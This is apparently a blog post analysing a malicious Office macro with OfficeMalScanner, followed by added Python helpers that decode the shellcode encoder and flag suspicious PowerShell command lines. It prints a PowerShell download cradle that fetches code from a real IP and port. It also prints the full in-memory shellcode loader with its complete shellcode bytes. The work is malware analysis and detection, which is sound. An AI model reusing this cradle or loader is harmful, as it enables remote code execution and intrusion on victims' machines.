Analyzing Iranian document [ 1st Stage ] as a practice

Hello all. Finally I came back after months, and I hope I won't leave that field again.

Let's analyze the malicious document.


First: it's not a proper article, so I hope it'll be fine.

Suppose you've got an email with a document attached and we want to make sure it's not malicious. What's the first step?


We will analyze it with the OfficeMalScanner tool, because I love it, or with any analysis tool you prefer. So let's start.

 

As you can see, we pass the info parameter to OfficeMalScanner to extract the macro code, if any exists.

The BIN code is shown at the end of the figure; let's open it in Notepad++.

 

It's Visual Basic code; you can choose that language from the Language menu to make it readable.

As you can see, it starts by declaring variables; we can skip that part and look for the important part.

Here is the most important part of the code: as you can see, it's a base64-encoded string, and we can decode it with any online or offline tool you prefer.


So the attacker uses this command:

powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://139.59.46.154:3485/eiloShaegae1'

And the attacker's IP is 139.59.46.154 with port 3485 open; the IP is located in Singapore.

And after decoding the second encoded string we get:

$Qsc = '$zw5 = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

// Reserves a region of memory for the shellcode

[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

// Creates the thread that executes the shellcode

[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);

'';$w = Add-Type -memberDefinition $zw5 -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];

 

// The Shellcode itself

[Byte[]]$z = 0xdb,0xcd,0xd9,0x74,0x24,0xf4,0xba,0x62,0x93,0xaf,0x6c,0x5e,0x31,0xc9,0xb1,0x57,0x31,0x56,0x18,0x83,0xee,0xfc,0x03,0x56,0x76,0x71,0x5a,0x90,0x9e,0xf7,0xa5,0x69,0x5e,0x98,0x2c,0x8c,0x6f,0x98,0x4b,0xc4,0xdf,0x28,0x1f,0x88,0xd3,0xc3,0x4d,0x39,0x60,0xa1,0x59,0x4e,0xc1,0x0c,0xbc,0x61,0xd2,0x3d,0xfc,0xe0,0x50,0x3c,0xd1,0xc2,0x69,0x8f,0x24,0x02,0xae,0xf2,0xc5,0x56,0x67,0x78,0x7b,0x47,0x0c,0x34,0x40,0xec,0x5e,0xd8,0xc0,0x11,0x16,0xdb,0xe1,0x87,0x2d,0x82,0x21,0x29,0xe2,0xbe,0x6b,0x31,0xe7,0xfb,0x22,0xca,0xd3,0x70,0xb5,0x1a,0x2a,0x78,0x1a,0x63,0x83,0x8b,0x62,0xa3,0x23,0x74,0x11,0xdd,0x50,0x09,0x22,0x1a,0x2b,0xd5,0xa7,0xb9,0x8b,0x9e,0x10,0x66,0x2a,0x72,0xc6,0xed,0x20,0x3f,0x8c,0xaa,0x24,0xbe,0x41,0xc1,0x50,0x4b,0x64,0x06,0xd1,0x0f,0x43,0x82,0xba,0xd4,0xea,0x93,0x66,0xba,0x13,0xc3,0xc9,0x63,0xb6,0x8f,0xe7,0x70,0xcb,0xcd,0x6f,0xe9,0xb1,0x99,0x6f,0x9d,0x4e,0x0b,0x01,0x34,0xe5,0xa3,0x91,0xb1,0x23,0x33,0xd6,0xeb,0x1d,0xe0,0x7b,0x47,0x0d,0x45,0x28,0x0f,0x8b,0x3f,0xb7,0x68,0x14,0x6a,0x14,0x24,0x81,0x96,0xc9,0x99,0x3d,0xc2,0xfc,0x1d,0xbe,0x1c,0x72,0x1d,0xbe,0xdc,0xa5,0x2e,0xc9,0xec,0xf6,0x78,0x35,0x5d,0x60,0xd2,0xbc,0xc2,0xb6,0x23,0x6b,0x75,0xf0,0x8f,0xfc,0x86,0xce,0xcf,0x79,0xd5,0x7d,0x43,0xd5,0x89,0xd7,0x0b,0x32,0x78,0xf9,0xf0,0x3b,0x56,0x93,0x6d,0xce,0x06,0xf3,0xf1,0xfd,0xb8,0x03,0x7b,0xe1,0xd3,0x07,0x2b,0x88,0x3c,0x51,0xa3,0x39,0x05,0xc3,0xb5,0x3d,0x5c,0xa8,0xea,0x92,0x0c,0x18,0x65,0x38,0xb5,0xbc,0x0e,0xbd,0x6c,0x39,0x30,0x34,0x85,0x0e,0xc4,0x6e,0xf1,0x60,0x93,0x33,0x54,0x7f,0x09,0x59,0x19,0x17,0xb2,0x8e,0x99,0xe7,0xda,0xae,0x99,0xa7,0x1a,0xfc,0xf1,0x7f,0xbf,0x51,0xe7,0x80,0x6a,0xc6,0xb4,0x2d,0x1c,0x0e,0x6d,0xb9,0x1e,0xf1,0x92,0x39,0x4c,0xa7,0xfa,0x2b,0xe4,0xce,0x19,0xb4,0xdd,0x54,0x1d,0x3e,0x13,0xdd,0x99,0xbf,0x68,0x67,0x65,0xca,0x8b,0x30,0xa5,0x6b,0xbc,0xb4,0xd6,0x6c,0xc3,0x03,0x1c,0xbc,0x0b,0x5a,0x70,0xf1,0x41,0x9a,0xa2,0xc0,0x93,0xef,0xba;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$KMbD=$w::VirtualAlloc(0,0x1000,$g,0x40);

So here is the shellcode after cleaning it up into a \x-escaped string (one \x prefix per byte; the PowerShell 0x prefix must be dropped, because a mixed form such as 0xdb\x0xcd adds an extra hex digit to every byte and shifts the whole stream, so anything disassembled from it is meaningless):

\xdb\xcd\xd9\x74\x24\xf4\xba\x62\x93\xaf\x6c\x5e\x31\xc9\xb1\x57\x31\x56\x18\x83\xee\xfc\x03\x56\x76\x71\x5a\x90\x9e\xf7\xa5\x69\x5e\x98\x2c\x8c\x6f\x98\x4b\xc4\xdf\x28\x1f\x88\xd3\xc3\x4d\x39\x60\xa1\x59\x4e\xc1\x0c\xbc\x61\xd2\x3d\xfc\xe0\x50\x3c\xd1\xc2\x69\x8f\x24\x02\xae\xf2\xc5\x56\x67\x78\x7b\x47\x0c\x34\x40\xec\x5e\xd8\xc0\x11\x16\xdb\xe1\x87\x2d\x82\x21\x29\xe2\xbe\x6b\x31\xe7\xfb\x22\xca\xd3\x70\xb5\x1a\x2a\x78\x1a\x63\x83\x8b\x62\xa3\x23\x74\x11\xdd\x50\x09\x22\x1a\x2b\xd5\xa7\xb9\x8b\x9e\x10\x66\x2a\x72\xc6\xed\x20\x3f\x8c\xaa\x24\xbe\x41\xc1\x50\x4b\x64\x06\xd1\x0f\x43\x82\xba\xd4\xea\x93\x66\xba\x13\xc3\xc9\x63\xb6\x8f\xe7\x70\xcb\xcd\x6f\xe9\xb1\x99\x6f\x9d\x4e\x0b\x01\x34\xe5\xa3\x91\xb1\x23\x33\xd6\xeb\x1d\xe0\x7b\x47\x0d\x45\x28\x0f\x8b\x3f\xb7\x68\x14\x6a\x14\x24\x81\x96\xc9\x99\x3d\xc2\xfc\x1d\xbe\x1c\x72\x1d\xbe\xdc\xa5\x2e\xc9\xec\xf6\x78\x35\x5d\x60\xd2\xbc\xc2\xb6\x23\x6b\x75\xf0\x8f\xfc\x86\xce\xcf\x79\xd5\x7d\x43\xd5\x89\xd7\x0b\x32\x78\xf9\xf0\x3b\x56\x93\x6d\xce\x06\xf3\xf1\xfd\xb8\x03\x7b\xe1\xd3\x07\x2b\x88\x3c\x51\xa3\x39\x05\xc3\xb5\x3d\x5c\xa8\xea\x92\x0c\x18\x65\x38\xb5\xbc\x0e\xbd\x6c\x39\x30\x34\x85\x0e\xc4\x6e\xf1\x60\x93\x33\x54\x7f\x09\x59\x19\x17\xb2\x8e\x99\xe7\xda\xae\x99\xa7\x1a\xfc\xf1\x7f\xbf\x51\xe7\x80\x6a\xc6\xb4\x2d\x1c\x0e\x6d\xb9\x1e\xf1\x92\x39\x4c\xa7\xfa\x2b\xe4\xce\x19\xb4\xdd\x54\x1d\x3e\x13\xdd\x99\xbf\x68\x67\x65\xca\x8b\x30\xa5\x6b\xbc\xb4\xd6\x6c\xc3\x03\x1c\xbc\x0b\x5a\x70\xf1\x41\x9a\xa2\xc0\x93\xef\xba
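To do that conversion reliably, and to see why a listing of the raw bytes is not yet the payload, here is an added Python helper (not part of the original post) that pulls the $z array out of the decoded script, emits the \x form, and recognises the fnstenv GetPC stub at the start. It assumes the Metasploit shikata_ga_nai decoder layout (mov edx,key; mov cl,count; xor [esi+disp],edx with key feedback), and the embedded sample is only the first 32 bytes of the array above.

```python
import re
import struct

# Sample input, constructed for this example: the first 32 bytes of the [Byte[]]$z
# array from the decoded PowerShell above, in the form the loader emits them.
# The full array is 372 bytes; the prologue is enough to identify the encoder.
SAMPLE_PS = ('[Byte[]]$z = 0xdb,0xcd,0xd9,0x74,0x24,0xf4,0xba,0x62,0x93,0xaf,0x6c,0x5e,'
             '0x31,0xc9,0xb1,0x57,0x31,0x56,0x18,0x83,0xee,0xfc,0x03,0x56,0x76,0x71,'
             '0x5a,0x90,0x9e,0xf7,0xa5,0x69;$g = 0x1000;')

def parse_byte_array(ps_text: str, var: str = 'z') -> bytes:
    """Extract `[Byte[]]$var = 0x..,0x..` from a PowerShell loader as raw bytes."""
    pat = r'\[Byte\[\]\]\$' + re.escape(var) + r'\s*=\s*((?:0x[0-9a-fA-F]{1,2}\s*,?\s*)+)'
    m = re.search(pat, ps_text)
    if not m:
        raise ValueError('byte array not found')
    return bytes(int(t, 16) for t in re.findall(r'0x([0-9a-fA-F]{1,2})', m.group(1)))

def to_escaped(buf: bytes) -> str:
    """One \\xNN per byte. Writing 0xdb\\x0xcd... instead leaves an extra digit per
    byte, shifts every nibble, and makes any disassembly of the string garbage."""
    return ''.join(f'\\x{b:02x}' for b in buf)

def analyze_stub(buf: bytes) -> dict:
    """Spot the fnstenv GetPC + XOR-loop prologue of Metasploit's shikata_ga_nai
    encoder (assumed layout for this sample) and decode the blocks present.
    pop esi yields the address of the first FPU instruction, i.e. offset 0, so
    the xor displacement is the offset where the encoded data begins."""
    fp = buf.find(b'\xd9\x74\x24\xf4')                 # fnstenv [esp-0xc]
    if fp < 0 or buf[fp + 4] != 0xba:                  # mov edx, imm32 (initial key)
        raise ValueError('no fnstenv/mov-key prologue')
    key0 = key = struct.unpack_from('<I', buf, fp + 5)[0]
    blocks = buf[buf.index(b'\x31\xc9\xb1', fp) + 3]   # xor ecx,ecx; mov cl, N
    start = buf[buf.index(b'\x31\x56', fp) + 2]        # xor [esi+disp8], edx
    out = bytearray()
    for off in range(start, min(len(buf), start + 4 * blocks) - 3, 4):
        plain = struct.unpack_from('<I', buf, off)[0] ^ key
        key = (key + plain) & 0xffffffff               # feedback: add edx, [esi+..]
        out += struct.pack('<I', plain)
    # The first three decoded bytes complete the decoder itself (the add's disp8
    # and the loop rel8); the real payload starts right after them.
    return {'key': key0, 'blocks': blocks, 'start': start,
            'decoded': bytes(out), 'payload_head': bytes(out[3:])}
```

On the sample the decoded payload begins with fc e8 82 00 00 (cld; call), the usual opening of a Metasploit Windows stager, which is what a disassembler should be pointed at.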


That string can then be pasted into an online disassembler, for example:


https://defuse.ca/online-x86-assembler.htm#disassembly2

 

We will discuss it later, after learning more; for now we only analyze the malicious document.

 

for ($i=0;$i -le ($z.Length-1);$i++) {

$w::memset([IntPtr]($KMbD.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$KMbD,0,0,0);

for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($Qsc));

$wYc = "-e ";

if([IntPtr]::Size -eq 8){

$bgsQ = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $bgsQ $wYc $e"

}else{;iex "& powershell $wYc $e";}


So here it is executing the shellcode.
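As an added detection example (not from the post): the chain above leaves three command-line traits worth hunting for, the download cradle (-w hidden -noni -nop -c with iex and DownloadString), the -e argument whose UTF-16LE base64 hides Add-Type with VirtualAlloc/CreateThread, and the explicit syswow64 PowerShell the script picks on 64-bit hosts because its shellcode is x86. The log lines are constructed and the indicator names are my own.

```python
import base64
import binascii
import re

# Constructed process-creation command lines (Sysmon / 4688 style) for this example.
# [0] is the cradle from the macro, [1] a benign admin script, [2] the 32-bit
# relaunch with an encoded command like the one the decoded script builds.
SAMPLE_CMDLINES = [
    'powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient)'
    '.DownloadString(\'http://139.59.46.154:3485/eiloShaegae1\')"',
    'powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1',
    'C:\\Windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell -e '
    + base64.b64encode(('$w = Add-Type -memberDefinition $zw5 -Name "Win32" -passthru;'
                        '[DllImport("kernel32.dll")] VirtualAlloc CreateThread'
                        ).encode('utf-16-le')).decode(),
]

CRADLE_FLAGS = ('-w hidden', '-noni', '-nop', 'iex', 'downloadstring')
INJECT_APIS = ('virtualalloc', 'createthread', 'memset', 'add-type')

def decode_encoded_arg(cmd: str) -> str:
    """Return the plaintext behind `-e <base64>` (UTF-16LE), or '' if absent/invalid."""
    m = re.search(r'(?:-e|-enc|-encodedcommand)\s+([A-Za-z0-9+/=]+)', cmd, re.I)
    if not m:
        return ''
    try:
        return base64.b64decode(m.group(1)).decode('utf-16-le', errors='ignore')
    except binascii.Error:
        return ''

def indicators(cmd: str) -> list:
    """Name the loader traits seen in one command line (empty list = nothing found)."""
    low = cmd.lower()
    found = []
    if 'powershell' in low and sum(f in low for f in CRADLE_FLAGS) >= 3:
        found.append('download_cradle')       # hidden, non-interactive, no profile, iex+DownloadString
    if re.search(r'https?://\d{1,3}(?:\.\d{1,3}){3}:\d+/', low):
        found.append('raw_ip_url')            # C2 addressed by bare IP:port
    if 'syswow64' in low and 'powershell' in low:
        found.append('wow64_powershell')      # 32-bit host picked on x64: x86 shellcode
    plain = decode_encoded_arg(cmd).lower()
    if plain:
        found.append('encoded_command')
        if sum(a in plain for a in INJECT_APIS) >= 2:
            found.append('inline_shellcode_loader')  # Add-Type + VirtualAlloc/CreateThread
    return found

def triage(cmdlines) -> dict:
    """Map each command line to its indicator list, for a quick sweep over a log export."""
    return {c: indicators(c) for c in cmdlines}
```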



Today we learned how to analyze a malicious document and get useful information from its macro code.

We will discuss more later.

salam
